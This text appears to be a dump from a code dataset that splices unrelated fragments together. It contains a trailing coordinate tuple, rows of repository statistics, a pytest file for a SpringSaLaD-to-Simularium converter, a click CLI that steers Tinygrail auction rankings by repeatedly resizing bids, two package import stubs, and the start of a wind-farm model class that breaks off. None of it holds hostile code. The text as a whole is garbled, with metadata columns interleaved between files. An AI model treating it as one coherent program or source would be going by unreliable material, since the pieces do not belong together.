    (-0.0432, -0.5585, 0.0),
    (-0.0212, -0.5713, 0.0),
    (0.0, -0.5828, 0.0),
    (0.0212, -0.5713, 0.0),
    (0.0432, -0.5585, 0.0),
    (0.0658, -0.5443, 0.0),
    (0.089, -0.5288, 0.0),
    (0.1126, -0.5121, 0.0),
    (0.1365, -0.494, 0.0),
    (0.1606, -0.4747, 0.0),
    (0.1847, -0.4541, 0.0),
    (0.2088, -0.4323, 0.0),
    (0.2328, -0.4093, 0.0),
    (0.2564, -0.3852, 0.0),
    (0.2796, -0.3599, 0.0),
    (0.3022, -0.3334, 0.0),
    (0.3242, -0.3058, 0.0),
    (0.3454, -0.2771, 0.0),
    (0.3657, -0.2474, 0.0),
    (0.3822, -0.2217, 0.0),
    (0.3981, -0.1959, 0.0),
    (0.4133, -0.17, 0.0),
    (0.4278, -0.144, 0.0),
    (0.4413, -0.118, 0.0),
    (0.4539, -0.0922, 0.0),
    (0.4654, -0.0664, 0.0),
    (0.4757, -0.0409, 0.0),
    (0.4846, -0.0157, 0.0),
    (0.4921, 0.0092, 0.0),
    (0.4981, 0.0337, 0.0),
    (0.5024, 0.0577, 0.0),
    (0.5049, 0.0812, 0.0),
    (0.5056, 0.104, 0.0),
    (0.5043, 0.1263, 0.0),
    (0.5009, 0.1478, 0.0),
    (0.4962, 0.1675, 0.0),
    (0.4907, 0.1863, 0.0),
    (0.4843, 0.2041, 0.0),
    (0.477, 0.2209, 0.0),
    (0.469, 0.2368, 0.0),
    (0.46, 0.2519, 0.0),
    (0.4501, 0.266, 0.0),
    (0.4394, 0.2793, 0.0),
    (0.4277, 0.2918, 0.0),
    (0.4151, 0.3036, 0.0),
    (0.4015, 0.3145, 0.0),
    (0.387, 0.3248, 0.0),
    (0.3716, 0.3343, 0.0),
    (0.3551, 0.3432, 0.0),
    (0.3377, 0.3514, 0.0),
    (0.3192, 0.359, 0.0),
    (0.298, 0.366, 0.0),
    (0.2776, 0.3707, 0.0),
    (0.2577, 0.3734, 0.0),
    (0.2383, 0.3742, 0.0),
    (0.2193, 0.3735, 0.0),
    (0.2006, 0.3715, 0.0),
    (0.1819, 0.3684, 0.0),
    (0.1633, 0.3646, 0.0),
    (0.1445, 0.3603, 0.0),
    (0.1255, 0.3557, 0.0),
    (0.1062, 0.3511, 0.0),
    (0.0864, 0.3467, 0.0),
    (0.066, 0.3429, 0.0),
    (0.0449, 0.3398, 0.0),
    (0.0229, 0.3378, 0.0),
)
| 24.175573
| 25
| 0.476476
| 770
| 3,167
| 1.958442
| 0.17013
| 0.343501
| 0.258621
| 0.009284
| 0.983422
| 0.983422
| 0.983422
| 0.983422
| 0.96817
| 0
| 0
| 0.564528
| 0.163246
| 3,167
| 130
| 26
| 24.361538
| 0.004528
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
ad98f65b342dd1768033b9d004268d583eaec36d
| 22,809
|
py
|
Python
|
simulariumio/tests/converters/test_springsalad_converter.py
|
allen-cell-animated/simularium-conversion
|
47ba9a5a8105cf5cd36592d859252df642b1f1f9
|
[
"Apache-2.0"
] | null | null | null |
simulariumio/tests/converters/test_springsalad_converter.py
|
allen-cell-animated/simularium-conversion
|
47ba9a5a8105cf5cd36592d859252df642b1f1f9
|
[
"Apache-2.0"
] | null | null | null |
simulariumio/tests/converters/test_springsalad_converter.py
|
allen-cell-animated/simularium-conversion
|
47ba9a5a8105cf5cd36592d859252df642b1f1f9
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import pytest
from simulariumio.springsalad import SpringsaladConverter, SpringsaladData
from simulariumio import DisplayData, MetaData, InputFileData
from simulariumio.constants import (
DEFAULT_CAMERA_SETTINGS,
CURRENT_VERSION,
DISPLAY_TYPE,
)
@pytest.mark.parametrize(
"trajectory, expected_data",
[
# truncated data from tutorial example
(
SpringsaladData(
sim_view_txt_file=InputFileData(
file_path=(
"simulariumio/tests/data/springsalad/"
"Simulation0_SIM_VIEW_Run0.txt"
),
),
meta_data=MetaData(
scale_factor=0.1,
),
display_data={
"GREEN": DisplayData(
name="A",
radius=10.0,
display_type=DISPLAY_TYPE.OBJ,
url="a.obj",
color="#dfdacd",
),
"RED": DisplayData(
name="B",
color="#0080ff",
),
},
draw_bonds=False,
),
{
"trajectoryInfo": {
"version": CURRENT_VERSION.TRAJECTORY_INFO,
"timeUnits": {
"magnitude": 1.0,
"name": "s",
},
"timeStepSize": 0.1,
"totalSteps": 2,
"spatialUnits": {
"magnitude": 10.0,
"name": "nm",
},
"size": {"x": 10.0, "y": 10.0, "z": 20.0},
"cameraDefault": {
"position": {
"x": DEFAULT_CAMERA_SETTINGS.CAMERA_POSITION[0],
"y": DEFAULT_CAMERA_SETTINGS.CAMERA_POSITION[1],
"z": DEFAULT_CAMERA_SETTINGS.CAMERA_POSITION[2],
},
"lookAtPosition": {
"x": DEFAULT_CAMERA_SETTINGS.LOOK_AT_POSITION[0],
"y": DEFAULT_CAMERA_SETTINGS.LOOK_AT_POSITION[1],
"z": DEFAULT_CAMERA_SETTINGS.LOOK_AT_POSITION[2],
},
"upVector": {
"x": DEFAULT_CAMERA_SETTINGS.UP_VECTOR[0],
"y": DEFAULT_CAMERA_SETTINGS.UP_VECTOR[1],
"z": DEFAULT_CAMERA_SETTINGS.UP_VECTOR[2],
},
"fovDegrees": DEFAULT_CAMERA_SETTINGS.FOV_DEGREES,
},
"typeMapping": {
"0": {
"name": "A",
"geometry": {
"displayType": "OBJ",
"url": "a.obj",
"color": "#dfdacd",
},
},
"1": {
"name": "B",
"geometry": {
"displayType": "SPHERE",
"color": "#0080ff",
},
},
"2": {
"name": "GRAY",
"geometry": {
"displayType": "SPHERE",
},
},
"3": {
"name": "CYAN",
"geometry": {
"displayType": "SPHERE",
},
},
"4": {
"name": "BLUE",
"geometry": {
"displayType": "SPHERE",
},
},
},
},
"spatialData": {
"version": CURRENT_VERSION.SPATIAL_DATA,
"msgType": 1,
"bundleStart": 0,
"bundleSize": 2,
"bundleData": [
{
"frameNumber": 0,
"time": 0.0,
"data": [
1000.0,
100000000.0,
0.0,
-2.3515194000000004,
4.1677663,
-0.2872943,
0.0,
0.0,
0.0,
1.0,
0.0,
1000.0,
100010000.0,
0.0,
-1.1726563,
3.7363461000000004,
-0.47181300000000004,
0.0,
0.0,
0.0,
1.0,
0.0,
1000.0,
100200001.0,
1.0,
-0.3749313,
0.6674895000000001,
-0.5000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100200000.0,
2.0,
-0.3749313,
0.6674895000000001,
0.000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100200002.0,
3.0,
-0.3749313,
0.6674895000000001,
0.5000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100300000.0,
4.0,
-2.9673074,
0.5123882000000001,
5.0633669,
0.0,
0.0,
0.0,
0.1,
0.0,
],
},
{
"frameNumber": 1,
"time": 0.10000000998802996,
"data": [
1000.0,
100200001.0,
1.0,
3.8385084999999997,
-2.5307899000000003,
-0.5000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100200000.0,
2.0,
3.7610036000000004,
-2.4899603,
0.000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100200002.0,
3.0,
3.6784268,
-2.5100304,
0.5000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100210001.0,
1.0,
0.9422604,
1.1849763,
-0.5000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100300000.0,
4.0,
1.7784686,
0.8480382000000001,
1.8389947,
0.0,
0.0,
0.0,
0.1,
0.0,
],
},
],
},
"plotData": {"version": CURRENT_VERSION.PLOT_DATA, "data": []},
},
),
# truncated data from tutorial example (and draw bonds)
(
SpringsaladData(
sim_view_txt_file=InputFileData(
file_path=(
"simulariumio/tests/data/springsalad/"
"Simulation0_SIM_VIEW_Run0.txt"
),
),
meta_data=MetaData(
scale_factor=0.1,
),
display_data={
"GREEN": DisplayData(
name="A",
radius=10.0,
display_type=DISPLAY_TYPE.OBJ,
url="a.obj",
color="#dfdacd",
),
"RED": DisplayData(
name="B",
color="#0080ff",
),
},
),
{
"trajectoryInfo": {
"version": CURRENT_VERSION.TRAJECTORY_INFO,
"timeUnits": {
"magnitude": 1.0,
"name": "s",
},
"timeStepSize": 0.1,
"totalSteps": 2,
"spatialUnits": {
"magnitude": 10.0,
"name": "nm",
},
"size": {"x": 10.0, "y": 10.0, "z": 20.0},
"cameraDefault": {
"position": {
"x": DEFAULT_CAMERA_SETTINGS.CAMERA_POSITION[0],
"y": DEFAULT_CAMERA_SETTINGS.CAMERA_POSITION[1],
"z": DEFAULT_CAMERA_SETTINGS.CAMERA_POSITION[2],
},
"lookAtPosition": {
"x": DEFAULT_CAMERA_SETTINGS.LOOK_AT_POSITION[0],
"y": DEFAULT_CAMERA_SETTINGS.LOOK_AT_POSITION[1],
"z": DEFAULT_CAMERA_SETTINGS.LOOK_AT_POSITION[2],
},
"upVector": {
"x": DEFAULT_CAMERA_SETTINGS.UP_VECTOR[0],
"y": DEFAULT_CAMERA_SETTINGS.UP_VECTOR[1],
"z": DEFAULT_CAMERA_SETTINGS.UP_VECTOR[2],
},
"fovDegrees": DEFAULT_CAMERA_SETTINGS.FOV_DEGREES,
},
"typeMapping": {
"0": {
"name": "A",
"geometry": {
"displayType": "OBJ",
"url": "a.obj",
"color": "#dfdacd",
},
},
"1": {
"name": "B",
"geometry": {
"displayType": "SPHERE",
"color": "#0080ff",
},
},
"2": {
"name": "GRAY",
"geometry": {
"displayType": "SPHERE",
},
},
"3": {
"name": "CYAN",
"geometry": {
"displayType": "SPHERE",
},
},
"4": {
"name": "BLUE",
"geometry": {
"displayType": "SPHERE",
},
},
"5": {
"name": "Link",
"geometry": {
"displayType": "FIBER",
},
},
},
},
"spatialData": {
"version": CURRENT_VERSION.SPATIAL_DATA,
"msgType": 1,
"bundleStart": 0,
"bundleSize": 2,
"bundleData": [
{
"frameNumber": 0,
"time": 0.0,
"data": [
1000.0,
100000000.0,
0.0,
-2.3515194000000004,
4.1677663,
-0.2872943,
0.0,
0.0,
0.0,
1.0,
0.0,
1000.0,
100010000.0,
0.0,
-1.1726563,
3.7363461000000004,
-0.47181300000000004,
0.0,
0.0,
0.0,
1.0,
0.0,
1000.0,
100200001.0,
1.0,
-0.3749313,
0.6674895000000001,
-0.5000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100200000.0,
2.0,
-0.3749313,
0.6674895000000001,
0.000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100200002.0,
3.0,
-0.3749313,
0.6674895000000001,
0.5000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100300000.0,
4.0,
-2.9673074,
0.5123882000000001,
5.0633669,
0.0,
0.0,
0.0,
0.1,
0.0,
1001.0,
0.0,
5.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
1.0,
6.0,
-0.3749313,
0.6674895000000001,
0.000000,
-0.3749313,
0.6674895000000001,
-0.5000000,
1001.0,
1.0,
5.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
1.0,
6.0,
-0.3749313,
0.6674895000000001,
0.000000,
-0.3749313,
0.6674895000000001,
0.5000000,
],
},
{
"frameNumber": 1,
"time": 0.10000000998802996,
"data": [
1000.0,
100200001.0,
1.0,
3.8385084999999997,
-2.5307899000000003,
-0.5000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100200000.0,
2.0,
3.7610036000000004,
-2.4899603,
0.000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100200002.0,
3.0,
3.6784268,
-2.5100304,
0.5000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100210001.0,
1.0,
0.9422604,
1.1849763,
-0.5000000,
0.0,
0.0,
0.0,
0.2,
0.0,
1000.0,
100300000.0,
4.0,
1.7784686,
0.8480382000000001,
1.8389947,
0.0,
0.0,
0.0,
0.1,
0.0,
1001.0,
0.0,
5.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
1.0,
6.0,
3.7610036000000004,
-2.4899603,
0.000000,
3.8385084999999997,
-2.5307899000000003,
-0.5000000,
1001.0,
1.0,
5.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
1.0,
6.0,
3.7610036000000004,
-2.4899603,
0.000000,
3.6784268,
-2.5100304,
0.5000000,
],
},
],
},
"plotData": {"version": CURRENT_VERSION.PLOT_DATA, "data": []},
},
),
],
)
def test_springsalad_converter(trajectory, expected_data):
    # Convert the raw SpringSaLaD sim-view fixture and compare the resulting
    # simularium buffer dict against the expected fixture from the
    # parametrize table above; then verify no frame reuses an agent id.
    converter = SpringsaladConverter(trajectory)
    # NOTE(review): exercises private converter API (_read_trajectory_data,
    # _data) — will break if the converter internals are renamed.
    buffer_data = converter._read_trajectory_data(converter._data)
    assert expected_data == buffer_data
    assert converter._check_agent_ids_are_unique_per_frame(buffer_data)
| 39.598958
| 79
| 0.209873
| 1,170
| 22,809
| 3.983761
| 0.135043
| 0.096975
| 0.102982
| 0.106415
| 0.880927
| 0.880927
| 0.854323
| 0.83673
| 0.83673
| 0.83673
| 0
| 0.28152
| 0.716252
| 22,809
| 575
| 80
| 39.667826
| 0.438659
| 0.005831
| 0
| 0.864198
| 0
| 0
| 0.053105
| 0.005734
| 0
| 0
| 0
| 0
| 0.003527
| 1
| 0.001764
| false
| 0
| 0.007055
| 0
| 0.008818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
d17077384224f2e5e6364a96bb41766a645715e2
| 8,170
|
py
|
Python
|
src/bgmtinygrail/cli/rr_top.py
|
no1xsyzy/bgmtinygrail
|
4e762a58337f3021440a070967f1cb7a0213f8a6
|
[
"MIT"
] | 5
|
2020-05-17T02:41:01.000Z
|
2020-07-01T23:24:41.000Z
|
src/bgmtinygrail/cli/rr_top.py
|
no1xsyzy/bgmtinygrail
|
4e762a58337f3021440a070967f1cb7a0213f8a6
|
[
"MIT"
] | null | null | null |
src/bgmtinygrail/cli/rr_top.py
|
no1xsyzy/bgmtinygrail
|
4e762a58337f3021440a070967f1cb7a0213f8a6
|
[
"MIT"
] | 1
|
2021-02-09T04:41:15.000Z
|
2021-02-09T04:41:15.000Z
|
from datetime import datetime
from math import ceil, floor
import click
from ._base import TG_PLAYER
from ..tinygrail.api import top_week, character_auction, my_auctions
from ..tinygrail.bigc import BigC
def calculate_target_extra(target_rank):
    """Return the extra auction amount needed for a weekly-top rank.

    Ranks 1-3 map to 2000/1500/1000 (steps of 500); ranks 4-12 map to
    500 down to 100 (steps of 50).

    :param target_rank: desired rank, an int in 1..12.
    :raises ValueError: if ``target_rank`` is outside 1..12.
    """
    if target_rank in range(1, 4):
        return 2000 - 500 * (target_rank - 1)
    if target_rank in range(4, 13):
        return 500 - 50 * (target_rank - 4)
    # Improvement: the original bare ``raise ValueError`` carried no message.
    raise ValueError(f"target_rank must be an int in 1..12, got {target_rank!r}")
def wrap_do_auction(big_c, name):
    """Return a logging proxy for ``big_c.do_auction``.

    The returned callable echoes every call (arguments plus the implied
    total ``price*amount``) to stdout before forwarding it, tagging the
    log line with *name* so interleaved players can be told apart.
    """
    def _logged_do_auction(price, amount, allow_dec):
        # Echo exactly what is about to be submitted, then forward.
        print(f"{name}.do_auction({price=}, {amount=}, {allow_dec=}) # {price*amount=}")
        big_c.do_auction(price, amount, allow_dec=allow_dec)

    return _logged_do_auction
@click.command()
@click.argument('catcher', type=TG_PLAYER)
@click.argument('thrower', type=TG_PLAYER)
@click.argument('cid', type=int)
@click.argument('target_rank', type=click.IntRange(1, 12))
def rr_top(catcher, thrower, cid, target_rank):
    """Drive character *cid* to *target_rank* of the weekly top ranking.

    *catcher* holds the auction meant to actually win the shares, while
    *thrower* repeatedly resizes a steering auction until the observed
    rank settles at ``target_rank``.
    NOTE(review): this loops against live auction APIs until convergence,
    so it can run indefinitely if the rank never settles.
    """
    if target_rank in range(1, 4):
        # Requesting top-3 costs the spent cc's, so require explicit consent.
        click.confirm(f"You are requesting rank {target_rank}, "
                      "which will cause loss of used cc's, sure?", abort=True)
    target_extra = calculate_target_extra(target_rank)
    now_top_week = top_week()

    def get_rank():
        # Refresh the cached top-week list and return cid's 1-based rank,
        # or the sentinel 10000 when the character is not on the board.
        nonlocal now_top_week
        now_top_week = top_week()
        try:
            return next(i for i, e in enumerate(now_top_week) if e.character_id == cid) + 1
        except StopIteration:
            return 10000

    catcher_bc = BigC(catcher, cid)
    catcher_bc_do_auction = wrap_do_auction(catcher_bc, "catcher_bc")
    thrower_bc = BigC(thrower, cid)
    thrower_bc_do_auction = wrap_do_auction(thrower_bc, "thrower_bc")
    # Auction amounts may only be decreased outside Saturday (isoweekday 6).
    allow_dec = datetime.today().isoweekday() != 6
    ca = character_auction(catcher, cid)
    # Shares obtainable: the auctioned amount plus the rank-dependent bonus.
    total_can_get = ca.amount + target_extra
    base_price = ca.price
    # Round the base price up to whole cents.
    normalized_base_price = ceil(base_price * 100) * 0.01
    # Make sure both players hold at least a minimal auction to adjust later.
    if not my_auctions(thrower, [cid]):
        thrower_bc.do_auction(normalized_base_price, 1)
    if not my_auctions(catcher, [cid]):
        catcher_bc.do_auction(normalized_base_price, 1)
    # Bid one cent above the normalized base, but never below the catcher's
    # already-standing auction price.
    catch_price = max(normalized_base_price + 0.01, catcher_bc.my_auction_price)
    if allow_dec:
        # Decreasing is allowed: start with a coarse step and grab the full
        # amount up front (it can be trimmed back later).
        step = 1024
        catcher_bc_do_auction(catch_price, total_can_get, allow_dec)
    else:
        step = 1
    # reg records the direction of the previous adjustment; a direction flip
    # halves `step`, giving a binary-search style convergence on the rank.
    reg = None
    while (rank := get_rank()) != target_rank:
        if rank > 100:
            # Unranked / far outside the board: raise the thrower's total
            # value enough to reach the lowest score currently listed.
            current_total_value = thrower_bc.my_auction_total_value
            ca = character_auction(thrower, cid)  # should be fetched again
            target_delta_value = (min(tw.score_1 for tw in now_top_week)) / ca.auction_users
            thrower_bc_do_auction(
                normalized_base_price,
                floor((current_total_value + target_delta_value) / normalized_base_price) + 1,
                allow_dec
            )
        elif rank > target_rank:
            # Rank number too big (too far down the board): add value.
            if reg is True:
                step = (step + 1) // 2
            reg = False
            print(f"{rank} == rank > target_rank == {target_rank}")
            if catcher_bc.my_auction_amount < total_can_get:
                # Prefer growing the catcher until it holds the full amount.
                catcher_bc_do_auction(catch_price, catcher_bc.my_auction_amount + 1, allow_dec)
            else:
                current_total_value = thrower_bc.my_auction_total_value
                print(f"{current_total_value=}")
                # Score gap between the slot we want and the one we occupy.
                target_delta_value = now_top_week[target_rank - 1].score_2 - now_top_week[rank - 1].score_2
                print(f"{target_delta_value=}")
                thrower_bc_do_auction(
                    normalized_base_price,
                    floor((current_total_value + target_delta_value) / normalized_base_price) + 1,
                    allow_dec
                )
        else:  # rank < target_rank
            # Overshot (too high on the board): remove value.
            if reg is False:
                step = (step + 1) // 2
            reg = True
            print(f"{rank} == rank < target_rank == {target_rank}")
            if catcher_bc.my_auction_amount > total_can_get:
                catcher_bc_do_auction(catch_price, catcher_bc.my_auction_amount - 1, allow_dec)
            else:
                thrower_bc_do_auction(
                    normalized_base_price,
                    ceil(thrower_bc.my_auction_total_value / normalized_base_price) - step,
                    allow_dec
                )
    else:
        # while/else: the loop condition became false, i.e. the target rank
        # has been reached.
        print(f"{rank} == rank == target_rank == {target_rank}")
@click.command()
@click.argument('catcher', type=TG_PLAYER)
@click.argument('cid', type=int)
@click.option('-p', '--catch-price', type=float, default=None)
@click.option('-n', '--catch-amount', type=int, default=None)
@click.option('-t', '--target-rank', type=click.IntRange(1, 12), default=None)
def rr_top_catch(catcher, cid, catch_amount, target_rank, catch_price):
    """Place a single catching auction for character *cid* as *catcher*.

    At least one of ``--catch-amount`` or ``--target-rank`` must be given.
    Values not supplied explicitly are derived from the character's live
    auction state: the amount from the target rank's bonus, the price as
    the base price rounded up to whole cents plus one cent.

    :raises ValueError: if neither amount nor target rank was provided.
    """
    if catch_amount is None and target_rank is None:
        # Improvement: the original bare ``raise ValueError`` gave the user
        # no hint about what was missing.
        raise ValueError("either --catch-amount or --target-rank must be provided")
    if catch_price is None or catch_amount is None:
        # Fetch the live auction state only when something must be derived.
        ca = character_auction(catcher, cid)
        if catch_amount is None:
            assert target_rank is not None  # guaranteed by the guard above
            catch_amount = ca.amount + calculate_target_extra(target_rank)
        if catch_price is None:
            # Round the base price up to whole cents, then bid one cent above.
            catch_price = ceil(ca.price * 100) * 0.01 + 0.01
    catcher_bc = BigC(catcher, cid)
    catcher_bc_do_auction = wrap_do_auction(catcher_bc, "catcher_bc")
    # Auction amounts may only be decreased outside Saturday (isoweekday 6).
    allow_dec = datetime.today().isoweekday() != 6
    catcher_bc_do_auction(catch_price, catch_amount, allow_dec)
@click.command()
@click.argument('thrower', type=TG_PLAYER)
@click.argument('cid', type=int)
@click.argument('target_rank', type=click.IntRange(1, 12))
def rr_top_throw(thrower, cid, target_rank):
    """Steer character *cid* to *target_rank* using only a thrower account.

    Unlike ``rr_top`` there is no catcher: the thrower's own auction value
    is grown or shrunk until the weekly ranking settles at ``target_rank``.
    NOTE(review): loops against live auction APIs until convergence.
    """
    if target_rank in range(1, 4):
        # Requesting top-3 costs the spent cc's, so require explicit consent.
        click.confirm(f"You are requesting rank {target_rank}, "
                      "which will cause loss of used cc's, sure?", abort=True)
    now_top_week = top_week()

    def get_rank():
        # Refresh the cached top-week list and return cid's 1-based rank,
        # or the sentinel 10000 when the character is not on the board.
        nonlocal now_top_week
        now_top_week = top_week()
        try:
            return next(i for i, e in enumerate(now_top_week) if e.character_id == cid) + 1
        except StopIteration:
            return 10000

    thrower_bc = BigC(thrower, cid)
    thrower_bc_do_auction = wrap_do_auction(thrower_bc, "thrower_bc")
    ca = character_auction(thrower, cid)
    base_price = ca.price
    # Round the base price up to whole cents.
    normalized_base_price = ceil(base_price * 100) * 0.01
    # Auction amounts may only be decreased outside Saturday (isoweekday 6).
    allow_dec = datetime.today().isoweekday() != 6
    if allow_dec:
        # Coarse initial step; direction flips below halve it.
        step = 1024
    else:
        step = 1
    # Make sure the thrower holds at least a minimal auction to adjust later.
    if not my_auctions(thrower, [cid]):
        thrower_bc_do_auction(
            normalized_base_price,
            1,
            allow_dec
        )
    # reg records the direction of the previous adjustment; a direction flip
    # halves `step`, giving a binary-search style convergence on the rank.
    reg = None
    while (rank := get_rank()) != target_rank:
        if rank > 100:
            # Unranked / far outside the board: raise the total value enough
            # to reach the lowest score currently listed.
            current_total_value = thrower_bc.my_auction_total_value
            ca = character_auction(thrower, cid)
            target_delta_value = (min(tw.score_1 for tw in now_top_week)) / ca.auction_users
            thrower_bc_do_auction(
                normalized_base_price,
                floor((current_total_value + target_delta_value) / normalized_base_price) + 1,
                allow_dec
            )
        elif rank > target_rank:
            # Rank number too big (too far down the board): add value.
            if reg is True:
                step = (step + 1) // 2
            reg = False
            print(f"{rank} == rank > target_rank == {target_rank}")
            current_total_value = thrower_bc.my_auction_total_value
            print(f"{current_total_value=}")
            # Score gap between the slot we want and the one we occupy.
            target_delta_value = now_top_week[target_rank - 1].score_2 - now_top_week[rank - 1].score_2
            print(f"{target_delta_value=}")
            thrower_bc_do_auction(
                normalized_base_price,
                floor((current_total_value + target_delta_value) / normalized_base_price) + 1,
                allow_dec
            )
        else:  # rank < target_rank
            # Overshot (too high on the board): remove value.
            if reg is False:
                step = (step + 1) // 2
            reg = True
            print(f"{rank} == rank < target_rank == {target_rank}")
            thrower_bc_do_auction(
                normalized_base_price,
                ceil(thrower_bc.my_auction_total_value / normalized_base_price) - step,
                allow_dec
            )
    else:
        # while/else: the loop condition became false, i.e. the target rank
        # has been reached.
        print(f"{rank} == rank == target_rank == {target_rank}")
| 36.473214
| 107
| 0.619706
| 1,076
| 8,170
| 4.379182
| 0.121747
| 0.082767
| 0.059423
| 0.0382
| 0.828098
| 0.773557
| 0.726655
| 0.700127
| 0.700127
| 0.690365
| 0
| 0.019454
| 0.282742
| 8,170
| 223
| 108
| 36.636771
| 0.784642
| 0.007466
| 0
| 0.741935
| 0
| 0
| 0.090561
| 0.013942
| 0
| 0
| 0
| 0
| 0.005376
| 1
| 0.043011
| false
| 0
| 0.032258
| 0
| 0.112903
| 0.05914
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0f30cc4792468e9df5ffaf411d36798a60211a9c
| 116
|
py
|
Python
|
mwhiv/views/__init__.py
|
uw-ictd/mwbase
|
6a46b5c5459a6bb6e1ba84ea74f689da8efe9687
|
[
"Apache-2.0"
] | 1
|
2021-07-17T00:18:06.000Z
|
2021-07-17T00:18:06.000Z
|
mwpriya/views/__init__.py
|
akettel/mwbase
|
873b4fe8038f16feba5273990b0eb2109f8f05c6
|
[
"Apache-2.0"
] | 4
|
2017-08-31T17:09:53.000Z
|
2018-11-28T06:01:00.000Z
|
mwpriya/views/__init__.py
|
akettel/mwbase
|
873b4fe8038f16feba5273990b0eb2109f8f05c6
|
[
"Apache-2.0"
] | 2
|
2018-09-17T22:06:16.000Z
|
2021-07-17T00:18:09.000Z
|
from . import crispy
from mwbase.views.ajax import *
from mwbase.views.misc import *
from mwbase.views.old import *
| 23.2
| 31
| 0.775862
| 18
| 116
| 5
| 0.444444
| 0.333333
| 0.5
| 0.466667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 116
| 4
| 32
| 29
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7e745752d093682d95b3d131defa4bee1e2f71a6
| 201
|
py
|
Python
|
brainlit/algorithms/generate_fragments/__init__.py
|
neurodata/brainl
|
2de7b5b161000d4d0957de4e836c9e72f7b62ec0
|
[
"Apache-2.0"
] | null | null | null |
brainlit/algorithms/generate_fragments/__init__.py
|
neurodata/brainl
|
2de7b5b161000d4d0957de4e836c9e72f7b62ec0
|
[
"Apache-2.0"
] | 6
|
2020-01-31T22:21:10.000Z
|
2020-01-31T22:24:59.000Z
|
brainlit/algorithms/generate_fragments/__init__.py
|
neurodata/brainl
|
2de7b5b161000d4d0957de4e836c9e72f7b62ec0
|
[
"Apache-2.0"
] | null | null | null |
from brainlit.algorithms.generate_fragments.tube_seg import *
from brainlit.algorithms.generate_fragments.adaptive_thresh import *
from brainlit.algorithms.generate_fragments.state_generation import *
| 50.25
| 69
| 0.880597
| 24
| 201
| 7.125
| 0.5
| 0.210526
| 0.385965
| 0.526316
| 0.754386
| 0.526316
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059701
| 201
| 3
| 70
| 67
| 0.904762
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
7e7b7bbbd55a8439c9c9ff37c3276088b33c6cb9
| 186,483
|
py
|
Python
|
examples/grids/grid_bpu/wind_farm/wind_farm.py
|
pydae/pydae
|
8076bcfeb2cdc865a5fc58561ff8d246d0ed7d9d
|
[
"MIT"
] | 1
|
2020-12-20T03:45:26.000Z
|
2020-12-20T03:45:26.000Z
|
examples/grids/grid_bpu/wind_farm/wind_farm.py
|
pydae/pydae
|
8076bcfeb2cdc865a5fc58561ff8d246d0ed7d9d
|
[
"MIT"
] | null | null | null |
examples/grids/grid_bpu/wind_farm/wind_farm.py
|
pydae/pydae
|
8076bcfeb2cdc865a5fc58561ff8d246d0ed7d9d
|
[
"MIT"
] | null | null | null |
import numpy as np
import numba
import scipy.optimize as sopt
import json
# Module-level shorthands for the NumPy ufuncs referenced by the generated
# model code below — keeps the long auto-generated expressions readable.
sin = np.sin
cos = np.cos
atan2 = np.arctan2
sqrt = np.sqrt
sign = np.sign
exp = np.exp
class wind_farm_class:
def __init__(self):
self.t_end = 10.000000
self.Dt = 0.0010000
self.decimation = 10.000000
self.itol = 1e-6
self.Dt_max = 0.001000
self.Dt_min = 0.001000
self.solvern = 5
self.imax = 100
